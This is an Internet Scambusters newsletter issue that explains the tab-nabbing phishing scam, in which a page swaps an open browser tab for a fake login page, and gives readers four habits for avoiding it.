Special Issue: Tab-Nabbing — The Latest Internet Phishing Scam

Spot this cunning new Internet phishing trick that hijacks and switches browser page tabs: Internet Scambusters #395

Internet phishing for account numbers, log-on details and other personal information is one of the biggest online scams.

But as Internet users wise up, becoming more wary about clicking on unsafe links, crooks have come up with a new trick that changes legitimate pages into bogus ones without the user noticing.

“Tab-nabbing,” as it’s called, puts a powerful new weapon in the hands of identity thieves — but this week we show you how to spot and avoid it.

Time to get going…

Special Issue: Tab-Nabbing — The Latest Internet Phishing Scam

Just when you thought you’d seen it all, a new and particularly nasty form of Internet phishing, called tab-nabbing, poses a new identity theft threat to web users.

Phishing, just to remind you, happens when a scammer deceives you into giving away information about yourself, mostly account details such as username and password.

Usually via an email or a link on another web page, they direct you to a bogus site that looks exactly like the genuine article — like PayPal or Amazon for example — and captures your login details when you try to sign in.

The crook can then use those details to sign on and remove money or make purchases on your account.

You can read more about Internet phishing in some of our earlier issues.

Phishing Scams: How You Can Protect Yourself

New Clever PayPal Scam

3 New Phishing Scams: Clever Chase Bank Customer Survey Phishing Scam

All of these previous online phishing scams rely on the user being fooled into clicking a link, whereas the tab-nabber plays a different and much less obvious trick.

If you’re a regular Internet user, you’ll know how tabs work. In your browser — for example, Internet Explorer, Firefox, Safari or Google Chrome — they allow you to have several pages open at once, and to hop from one to the other.

Sometimes, when you click on a link in one page, it opens the new page in a separate tab, and it’s not unusual to have half a dozen or more tabs open at once.

You even forget which ones you had open, which helps the tab-nabber immensely.

The way this particularly evil form of Internet phishing works goes like this:

  • You already have a couple of tabs open when you land on a page controlled by the tab-nabber (though you won’t know this).
  • While you’re viewing this page, the tab-nabber accesses your browsing history to see which sites you regularly visit that have value to him — again like Amazon, PayPal or an email account like Gmail.
  • He (or she) then changes one of your tabbed pages to mimic one of these sites, complete with what looks like the genuine logo on the tab itself, hoping, when you return to this tab, you will think you must have visited that page earlier and just forgotten.
  • Even better, from the tab-nabber’s point of view, you may really have just visited the genuine site (your bank, for example), left it open in the tab, and then returned to it to discover you seem to have been logged out.
  • Either way, the aim is to get you to think you’re logging in again and, hey presto, the scammer has pulled off his cunning Internet phishing trick.

Two key aspects make this much more effective than previous online phishing scams:

First, you don’t have to click a link to get to the bogus page; you just click on what looks like a genuine page tab.

Second, it uses sites you habitually visit whereas phishing emails often seem to come from organizations you’ve had no dealings with, so you would immediately suspect something was wrong.

In addition, if you do your banking online, the bank often will actually sign you out if there’s no activity on their page, even if you still have it open in a tab. It’s not unusual to be asked to sign on again.

However, two other things give the tab-nabbing trick away: First, although the page may look genuine, the Internet address or URL (the name of the site given in the address bar at the top of your browser) won’t.

So, the real Amazon home page for instance will show “amazon.com” but a bogus page will have something quite different, even if it has the word “amazon” in it.

Second, the little padlock icon that appears in your browser (usually bottom right), when you visit a secure website, will be missing.

Still, it’s a wicked deception, highlighted recently by a specialist who works for Mozilla, the organization that makes the Firefox browser. You can see his video demonstration of tab-nabbing (sometimes also called “tabnabbing” or “tabnapping”) here if you have Adobe Flash installed.

What can you do to ensure you don’t fall victim to this new type of Internet phishing? To be doubly-secure, here’s what you should do.

  1. Get into the habit of glancing at the address bar for every page you visit or revisit. This makes good secure-surfing sense anyway.
  2. Look for that padlock on what should be a secure site page.
  3. After visiting a secure page, close it when you’re done, rather than keeping it open in a tab.
  4. If a site invites you to sign on again, close the tab and re-key the correct address.

Any one of these four steps should help steer you clear of a tab-nabbing scam — and if you have security software integrated with your browser, that should flag bogus sites too. With Internet phishing, you just can’t be too cautious.

That’s a wrap for this issue. Wishing you a great week!